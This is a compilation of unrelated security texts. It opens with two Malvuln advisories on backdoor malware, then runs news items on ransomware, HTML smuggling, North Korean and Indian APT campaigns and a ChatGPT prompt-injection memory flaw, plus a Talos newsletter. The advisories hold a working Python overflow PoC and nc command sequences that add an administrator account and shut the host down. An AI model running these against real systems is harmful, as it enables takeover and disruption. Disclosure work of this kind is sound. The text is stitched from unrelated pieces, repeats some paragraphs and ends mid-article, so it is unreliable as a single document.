Backdoor.Win32.Agent.pw malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/68dd7df213674e096d6ee255a7b90088.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Agent.pw  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 21111. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz triggering a stack buffer overflow overwriting the ECX, EDI registers and Structured Exception Handler (SEH). Sending a packet containing the ascii character "A" or "41", registers are overwritten with "3431" as 4 is 34 hex and 1 is 31 hex. The lowercase character "R" consistently triggers an access violation with registers being overwritten with "r" 72 hex.  
Family: Agent  
Type: PE32  
MD5: 68dd7df213674e096d6ee255a7b90088  
SHA256: 2ba1d27325224407b6d57e0e8d141e3f301225d18a68bb5380c46287a0fc4441  
Vuln ID: MVID-2024-0697  
Dropped files:   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1f90.1888): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=72727272 edx=040b1a3c esi=00000000 edi=00000002  
eip=76fced3c esp=0019de98 ebp=0019ded8 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:000> .ecxr  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

EXCEPTION_RECORD:  0019e09c -- (.exr 0x19e09c)  
ExceptionAddress: 00411515 (Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x00011515)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 72727276  
Attempt to write to address 72727276

PROCESS_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019e0ec -- (.cxr 0x19e0ec)  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????  
Resetting default scope

WRITE_ADDRESS:  72727276 

FOLLOWUP_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

FAULTING_THREAD:  00001888

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

LAST_CONTROL_TRANSFER:  from 0040c987 to 00411515

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019e56c 0040c987 025805a8 0000003f 0019e5bc Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515  
0019e768 72727272 72727272 72727272 72727272 Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0xc987  
0019e76c 72727272 72727272 72727272 72727272 0x72727272  
0019e770 72727272 72727272 72727272 72727272 0x72727272  
0019e774 72727272 72727272 72727272 72727272 0x72727272  
0019e778 72727272 72727272 72727272 72727272 0x72727272  
0019e77c 72727272 72727272 72727272 72727272 0x72727272  
0019e780 72727272 72727272 72727272 72727272 0x72727272  
0019e784 72727272 72727272 72727272 72727272 0x72727272  
0019e788 72727272 72727272 72727272 72727272 0x72727272  
0019e78c 72727272 72727272 72727272 72727272 0x72727272  
0019e790 72727272 72727272 72727272 72727272 0x72727272  
0019e794 72727272 72727272 72727272 72727272 0x72727272  
0019e798 72727272 72727272 72727272 72727272 0x72727272  
0019e79c 72727272 72727272 72727272 72727272 0x72727272  
0019e7a0 72727272 72727272 72727272 72727272 0x72727272  
0019e7a4 72727272 72727272 72727272 72727272 0x72727272  
0019e7a8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ac 72727272 72727272 72727272 72727272 0x72727272  
0019e7b0 72727272 72727272 72727272 72727272 0x72727272  
0019e7b4 72727272 72727272 72727272 72727272 0x72727272  
0019e7b8 72727272 72727272 72727272 72727272 0x72727272  
0019e7bc 72727272 72727272 72727272 72727272 0x72727272  
0019e7c0 72727272 72727272 72727272 72727272 0x72727272  
0019e7c4 72727272 72727272 72727272 72727272 0x72727272  
0019e7c8 72727272 72727272 72727272 72727272 0x72727272  
0019e7cc 72727272 72727272 72727272 72727272 0x72727272  
0019e7d0 72727272 72727272 72727272 72727272 0x72727272  
0019e7d4 72727272 72727272 72727272 72727272 0x72727272  
0019e7d8 72727272 72727272 72727272 72727272 0x72727272  
0019e7dc 72727272 72727272 72727272 72727272 0x72727272  
0019e7e0 72727272 72727272 72727272 72727272 0x72727272  
0019e7e4 72727272 72727272 72727272 72727272 0x72727272  
0019e7e8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ec 72727272 72727272 72727272 72727272 0x72727272  
0019e7f0 72727272 72727272 72727272 72727272 0x72727272  
0019e7f4 72727272 72727272 72727272 72727272 0x72727272  
0019e7f8 72727272 72727272 72727272 72727272 0x72727272  
0019e7fc 72727272 72727272 72727272 72727272 0x72727272  
0019e800 72727272 72727272 72727272 72727272 0x72727272  
0019e804 72727272 72727272 72727272 72727272 0x72727272  
0019e808 72727272 72727272 72727272 72727272 0x72727272  
0019e80c 72727272 72727272 72727272 72727272 0x72727272  
0019e810 72727272 72727272 72727272 72727272 0x72727272  
0019e814 72727272 72727272 72727272 72727272 0x72727272  
0019e818 72727272 72727272 72727272 72727272 0x72727272  
0019e81c 72727272 72727272 72727272 72727272 0x72727272  
0019e820 72727272 72727272 72727272 72727272 0x72727272  
0019e824 72727272 72727272 72727272 72727272 0x72727272  
0019e828 72727272 72727272 72727272 72727272 0x72727272  
0019e82c 72727272 72727272 72727272 72727272 0x72727272  
0019e830 72727272 72727272 72727272 72727272 0x72727272  
0019e834 72727272 72727272 72727272 72727272 0x72727272  
0019e838 72727272 72727272 72727272 72727272 0x72727272  
0019e83c 72727272 72727272 72727272 72727272 0x72727272  
0019e840 72727272 72727272 72727272 72727272 0x72727272  
0019e844 72727272 72727272 72727272 72727272 0x72727272  
0019e848 72727272 72727272 72727272 72727272 0x72727272  
0019e84c 72727272 72727272 72727272 72727272 0x72727272  
0019e850 72727272 72727272 72727272 72727272 0x72727272  
0019e854 72727272 72727272 72727272 72727272 0x72727272  
0019e858 72727272 72727272 72727272 72727272 0x72727272  
0019e85c 72727272 72727272 72727272 72727272 0x72727272  
0019e860 72727272 72727272 72727272 72727272 0x72727272  
0019e864 72727272 72727272 72727272 72727272 0x72727272  
0019e868 72727272 72727272 72727272 72727272 0x72727272  
0019e86c 72727272 72727272 72727272 72727272 0x72727272  
0019e870 72727272 72727272 72727272 72727272 0x72727272  
0019e874 72727272 72727272 72727272 72727272 0x72727272  
0019e878 72727272 72727272 72727272 72727272 0x72727272  
0019e87c 72727272 72727272 72727272 72727272 0x72727272  
0019e97c 76fa665c 0019ea68 001a1758 000007a0 0x72727272  
0019e9e0 76fa01a3 b8e17520 04394df0 04390000 ntdll!RtlpFindUnicodeStringInSection+0x19c  
0019ea14 00000000 00000003 00000000 0000003b ntdll!RtlpFreeHeap+0x723

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088

IMAGE_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  4228698c

STACK_COMMAND:  .cxr 0x19e0ec ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272_c0000409_Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272_MISSING_GSFRAME_Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

Followup: MachineOwner  
---------

0:000> !exchain  
0019df50: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
0019e8f8: 72727272  
Invalid exception stack at 72727272

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=21111  

def doit():  
    print("[+] Backdoor.Win32.Agent.pw")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 68dd7df213674e096d6ee255a7b90088")

    for i in range(1, 16):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="r"*512 * i   
        s.send(PAYLOAD.encode())  
        time.sleep(0.3)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    doit()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.pw MVID-2024-0697 Buffer Overflow

Backdoor.Win32.Boiling malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/80cb490e5d3c4205434850eff6ef5f8f.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BoilingVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 4369. Third party adversaries who can reach an infected host, can issue single OS commands to takeover the system undermining the initial infection.Family: BoilingType: PE32MD5: 80cb490e5d3c4205434850eff6ef5f8fSHA256: cbaefa79eb48d893426d438b48ca0fc6e7f6f4a6810b9c1e76bf625b69a609e1Vuln ID: MVID-2024-0696Disclosure: 09/27/2024Exploit/PoC:nc64.exe x.x.x.x 4369calcOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net user hyp3rlinx 666 /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net localgroup administrators hyp3rlinx /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369ping 8.8.8.8 > out.txtOK, Success in Execute Commandúshutdown -fOK, Success in Execute CommandúDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Boiling MVID-2024-0696 Code Execution

The threat actor known as Storm-0501 has targeted government, manufacturing, transportation, and law enforcement sectors in the U.S. to stage ransomware attacks.
The multi-stage attack campaign is designed to compromise hybrid cloud environments and perform lateral movement from on-premises to cloud environment, ultimately resulting in data exfiltration, credential theft, tampering, persistent

The threat actor known as Storm-0501 has targeted government, manufacturing, transportation, and law enforcement sectors in the U.S. to stage ransomware attacks.

The multi-stage attack campaign is designed to compromise hybrid cloud environments and perform lateral movement from on-premises to cloud environment, ultimately resulting in data exfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment, Microsoft said.

"Storm-0501 is a financially motivated cybercriminal group that uses commodity and open-source tools to conduct ransomware operations," according to the tech giant's threat intelligence team.

Active since 2021, the threat actor has a history of targeting education entities with Sabbath (54bb47h) ransomware before evolving into a ransomware-as-a-service (RaaS) affiliate delivering various ransomware payloads over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and Embargo ransomware.

A notable aspect of Storm-0501's attacks is the use of weak credentials and over-privileged accounts to move from organizations on-premises to cloud infrastructure.

Other initial access methods include using a foothold already established by access brokers like Storm-0249 and Storm-0900, or exploiting various known remote code execution vulnerabilities in unpatched internet-facing servers such as Zoho ManageEngine, Citrix NetScaler, and Adobe ColdFusion 2016.

The access afforded by any of the aforementioned approaches paves the way for extensive discovery operations to determine high-value assets, gather domain information, and perform Active Directory reconnaissance. This is followed by the deployment of remote monitoring and management tools (RMMs) like AnyDesk to maintain persistence.

"The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods," Microsoft said.

"The threat actor primarily utilized Impacket's SecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices to obtain credentials."

The compromised credentials are then used to access even more devices and extract additional credentials, with the threat actor simultaneously accessing sensitive files to extract KeePass secrets and conducting brute-force attacks to obtain credentials for specific accounts.

Microsoft said it detected Storm-0501 employing Cobalt Strike to move laterally across the network using the compromised credentials and send follow-on commands. Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.

The threat actor has also been observed creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises, making it the latest threat actor to target hybrid cloud setups after Octo Tempest and Manatee Tempest.

"The threat actor used the credentials, specifically Microsoft Entra ID (formerly Azure AD), that were stolen from earlier in the attack to move laterally from the on-premises to the cloud environment and establish persistent access to the target network through a backdoor," Redmond said.

The pivot to the cloud is said to be accomplished either through a compromised Microsoft Entra Connect Sync user account or via cloud session hijacking of an on-premises user account that has a respective admin account in the cloud with multi-factor authentication (MFA) disabled.

The attack culminates with the deployment of Embargo ransomware across the victim organization upon obtaining sufficient control over the network, exfiltrating files of interest, and lateral movement to the cloud. Embargo is a Rust-based ransomware first discovered in May 2024.

"Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom," Microsoft said.

"Embargo affiliates employ double extortion tactics, where they first encrypt a victim's files and threaten to leak stolen sensitive data unless a ransom is paid."

The disclosure comes as the DragonForce ransomware group has been targeting companies in manufacturing, real estate, and transportation sectors using a variant of the leaked LockBit3.0 builder and a modified version of Conti.

The attacks are characterized by the use of the SystemBC backdoor for persistence, Mimikatz and Cobalt Strike for credential harvesting, and Cobalt Strike for lateral movement. The U.S. accounts for more than 50% of the total victims, followed by the U.K. and Australia.

"The group employs double extortion tactics, encrypting data, and threatening leaks unless a ransom is paid," Singapore-headquartered Group-IB said. "The affiliate program, launched on 26 June 2024, offers 80% of the ransom to affiliates, along with tools for attack management and automation."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Identifies Storm-0501 as Major Threat in Hybrid Cloud Ransomware Attacks

Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling.
The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF

Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling.

The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF attachments or macro-laced Microsoft Excel documents.

"HTML smuggling is primarily a payload delivery mechanism," Netskope researcher Nikhil Hegde said in an analysis published Thursday. "The payload can be embedded within the HTML itself or retrieved from a remote resource."

The HTML file, in turn, can be propagated via bogus sites or malspam campaigns. Once the file is launched via the victim's web browser, the concealed payload is decoded and downloaded onto the machine.

The attack subsequently banks on some level of social engineering to convince the victim to open the malicious payload.

Netskope said it discovered HTML pages mimicking TrueConf and VK in the Russian language that when opened in a web browser, automatically download a password-protected ZIP archive to disk in an attempt to evade detection. The ZIP payload contains a nested RarSFX archive that ultimately leads to the deployment of the DCRat malware.

First released in 2018, DCRat is capable of functioning as a full-fledged backdoor that can be paired with additional plugins to extend its functionality. It can execute shell commands, log keystrokes, and exfiltrate files and credentials, among others.

Organizations are recommended to review HTTP and HTTPS traffic to ensure that systems are not communicating with malicious domains.

The development comes as Russian companies have been targeted by a threat cluster dubbed Stone Wolf to infect them with Meduza Stealer by sending phishing emails masquerading as a legitimate provider of industrial automation solutions.

"Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim," BI.ZONE said. By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments."

It also follows the emergence of malicious campaigns that have likely leveraged generative artificial intelligence (GenAI) to write VBScript and JavaScript code responsible for spreading AsyncRAT via HTML smuggling.

"The scripts' structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," HP Wolf Security said. "The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users

It shouldn’t just be viewed as a cybersecurity issue, because for a hardware supply chain attack, an adversary would likely need to physically infiltrate or tamper with the manufacturing process.

Thursday, September 26, 2024 14:00

The recent attacks in the Middle East triggering explosions on pagers has raised new fears around physical hardware supply chain attacks. 

In cybersecurity, we typically consider supply chain attacks to target software, in which adversaries infect a legitimate tool with a malicious, fake update that then spreads malware to affected devices. Think SolarWinds, Log4j, MOVEit, etc. 

In the case of hardware supply chain attacks, malicious actors infiltrate the supply of devices, or the physical manufacturing process of pieces of hardware and purposefully build in security flaws, faulty parts, or backdoors they know they can take advantage of in the future, such as malicious microchips on a circuit board.  

For Cisco’s part, the Cisco Trustworthy technologies program, including secure boot, Cisco Trust Anchor module (TAm), and runtime defenses give customers the confidence that the product is genuinely from Cisco. 

As I was thinking about the threat of hardware supply chain attacks, I was left wondering who, exactly, should be tasked with solving this problem. And I think I’ve decided the onus falls on several different sectors. 

It shouldn’t just be viewed as a cybersecurity issue, because for a hardware supply chain attack, an adversary would likely need to physically infiltrate or tamper with the manufacturing process. Entering a manufacturing facility or other stops along the logistics chain would require some level of network-level manipulation, such as faking a card reader or finding a way to trick physical defenses — that’s why Cisco Talos Incident Response looks for these types of things in Purple Team exercises.  

But it’s also a question of logistics and storage. Could a device be tampered with while it’s just being stored in a warehouse awaiting shipment? What about entering the back of a tractor-trailer that’s hauling the devices? Or even just being able to sneak photos of the devices’ information, say, for example, the EID on a cellphone or its SIM card.  

The process to protect against supply chain hardware attacks is not straightforward, unfortunately. There is little synchronization and partnership between logistics, cybersecurity, and manufacturing companies.  

There are also new technologies that can protect against physical tampering, like smart containers, real-time monitoring systems and automated security checkpoints, but these are all expensive solutions for security teams (at the physical and network levels) that are already stretched for budget and human capital.  

The cybersecurity industry certainly has a role to play in addressing supply chain attacks of all kinds, but it’s also not something this community alone can solve.  

**The one big thing **

Attackers are abusing features of legitimate internet websites to transmit spam. This web infrastructure and its associated email infrastructure are otherwise used for legitimate purposes, which makes blocking these messages more difficult for defenders, according to new research from Talos.  

**Why do I care? **

As a spammer, one of the problems with spinning up your own architecture to deliver mail is that once the spam starts flowing, these sources (IPs/domains) can be blocked. Realizing this, many spammers have elected to attack webpages and mail servers of legitimate organizations, so they may use these “pirated” resources to send unsolicited emails. Adversaries are still finding new ways to leverage preexisting tools and structures in email systems to send spam and malicious attachments that defenders wouldn’t normally consider.  

**So now what? **

There are several steps users can take to avoid receiving large amounts of spam or being duped by bad actors using “traditional” email tools. A strong password for your email account, or even better, a password manager, can keep your email account secure. When someone is using unique credentials everywhere, one single compromised account will not impact any other online accounts belonging to that victim. For admins and defenders, educating your users to be wary of such email messages is a good way to prevent them from falling victim to phishing and other attacks that arrive by email. 

**Top security headlines of the week **

**Representatives from cybersecurity company CrowdStrike spoke to U.S. Congress this week about a faulty update that shut down Windows machines across the country earlier this year.** The incident caused disruptions across multiple industries, including commercial flights, public transportation, retail and more. Lawmakers questioned whether the affected software should have access to core systems on computers, and the threat that AI-written code could present in the future. Executives from CrowdStrike took responsibility for the outage. They said the company was doing everything possible to prevent a similar incident from happening again and executing a broad “lessons learned” process. The incident forced over 8 million Microsoft Windows machines into the dreaded “Blue Screen of Death.” For the first 24 hours of the incident, rebooting the systems only worked if the user carried out a specific process that was complicated and needed to be explained by an expert. Eventually, an automatic update rolled out and fixed the issue. (Washington Post, BBC) 

**Security researchers have discovered a new Iranian state-sponsored actor that is providing initial access for other well-known APTs in the same country.** UNC1860 is believed to have ties to Iran’s Ministry of Intelligence and Security (MOIS) and provides access to other Iranian threat actors like OilRig and Scarred Manticore. The group’s focus is reportedly solely focused on breaching networks and obtaining an initial foothold, targeting a range of sectors including government, media, education, critical infrastructure and telecommunications. Researchers say UNC1860 has teamed up for attacks targeting organizations in Iraq, Saudi Arabia and Qatar, and laid the groundwork for wiper attacks in Albania and Israel. The group’s activities had gone largely undetected thus far because their implants are entirely passive, and don’t send any information out of the target network. The APT also doesn’t rely on any kind of command and control (C2) infrastructure. (Dark Reading, SecurityWeek) 

**Popular AI chat tool ChatGPT contains a flaw that could allow adversaries to implant false “memories” and steal user data in perpetuity.** A security researcher discovered a proof of concept in which they could store false information and malicious instructions in a user’s long-term memory settings through indirect prompt injection. The researcher first reported the vulnerability to OpenAI, the creator of ChatGPT, in May, but at the time the issue was labeled as a safety issue and not a security issue, closing out the case. After developing the POC, the company eventually released a partial fix earlier this month that prevents memories from being abused as an exfiltration vector. However, an adversary could still implant long-term information into ChatGPT through prompt injections targeting the memory tool, just not through the traditional ChatGPT web interface that most users access the tool through. (Ars Technica, wunderwuzzi's blog) 

**Can’t get enough Talos? ****Upcoming events where you can find Talos**

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 76491df69a26019139ac11117cd21bf5d0257a5ebd3d67837f558c8c9c3483d8   
**MD5:** b209df2951e29ab5eab4009579b10b8d  
**Typical Filename:** FileZilla\_3.67.1\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.76491DF69A-95.SBX.TG 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 581866eb9d50265b80bae4c49b04f033e2019797131e7697ca81ae267d1b4971   
**MD5:** 4c5fdfd4868ac91db8be52a9955649af   
**Typical Filename:** N/A   
**Claimed Product:** N/A   
**Detection Name:** W32.581866EB9D-100.SBX.TG

Are hardware supply chain attacks “cyber attacks?”

Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy.
The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima.
"These samples enhance Sparkling Pisces' already extensive arsenal

Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy.

The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima.

"These samples enhance Sparkling Pisces' already extensive arsenal and demonstrate the group's continuous evolution and increasing capabilities," Palo Alto Networks Unit 42 researchers Daniel Frank and Lior Rochberger said.

Active since at least 2012, the threat actor has been called the "king of spear phishing" for its ability to trick victims into downloading malware by sending emails that make it seem like they are from trusted parties.

Unit 42's analysis of Sparkling Pisces' infrastructure has uncovered two new portable executables referred to as KLogEXE and FPSpy.

KLogExe is a C++ version of the PowerShell-based keylogger named InfoKey that was highlighted by JPCERT/CC in connection with a Kimsuky campaign targeting Japanese organizations.

The malware comes equipped with capabilities to collect and exfiltrate information about the applications currently running on the compromised workstation, keystrokes typed, and mouse clicks.

On the other hand, FPSpy is said to be a variant of the backdoor that AhnLab disclosed in 2022, with overlaps identified to a malware that Cyberseason documented under the name KGH\_SPY in late 2020.

FPSpy, in addition to keylogging, is also engineered to gather system information, download and execute more payloads, run arbitrary commands, and enumerate drives, folders, and files on the infected device.

Unit 42 said it was also able to identify points of similarities in the source code of both KLogExe and FPSpy, suggesting that they are likely the work of the same author.

"Most of the targets we observed during our research originated from South Korea and Japan, which is congruent with previous Kimsuky targeting," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

N. Korean Hackers Deploy New KLogEXE and FPSpy Malware in Targeted Attacks

Who needs advanced malware when you can take advantage of a bunch of OSS tools and free cloud services to compromise your target?

Source: National Picture Library via Alamy Stock Photo

A threat actor is leveraging Cloudflare Worker cloud services and other tools to perform espionage against government and law enforcement targets in and around the Indian subcontinent.

"SloppyLemming" is an advanced persistent threat (APT) that Crowdstrike (tracking it as Outrider Tiger) has previously linked to India. That attribution rings consistent with the group's latest effort to steal valuable intelligence from a wide range of sensitive organizations in countries hugging India's borders.

Among its victims: government agencies — legislative bodies, foreign affairs, defense — IT and telecommunications providers, construction companies, and Pakistan's sole nuclear power facility. Pakistani police departments and other law enforcement came under particular fire, but SloppyLemming's attacks also spread to the Bangladeshi and Sri Lankan militaries and governments, as well as organizations in China's energy and academic sectors, and there have been hints of potential targeting in or around Australia's capital, Canberra.

The campaign, described in a new blog post from Cloudflare, employs Discord, Dropbox, GitHub, and most notably Cloudflare's own "Workers" platform together in phishing attack chains that end in credential harvesting and email compromise.

**Hackers Using Cloudflare Workers**

SloppyLemming attacks generally begin with a spear-phishing email — say, a fake maintenance alert from a police station's IT department. It distinguishes itself more in step two when it abuses Cloudflare's Workers service.

Cloudflare Workers are a serverless computing platform for running scripts that operate on Web traffic flowing through Cloudflare's global servers. They're essentially chunks of JavaScript that intercept requests made to a user's website in transit — before they reach the user's origin server and apply some sort of function to them, for example, redirecting links or adding security headers.

Like other flexible, multifunctional legitimate services, Cloudflare Workers can also be abused for malicious ends. In 2020, Korean hackers used Workers to perform SEO spam, and a backdoor called "BlackWater" used it to interface with its command-and-control (C2) server; the following year, attackers used it to facilitate a cryptocurrency scam.

SloppyLemming uses a custom-built tool called "CloudPhish" to handle credential logging logic and exfiltration. CloudPhish users first define their targets, and their intended channel for exfiltration. Then the program scrapes the HTML content associated with the target's webmail login page, and creates a malicious copycat with it. When the target enters their login information, it's stolen via a Discord webhook.

**Abusing Cloud Services**

SloppyLemming has other tricks up its sleeve, too. In limited cases, it used a malicious Worker to collect Google OAuth tokens.

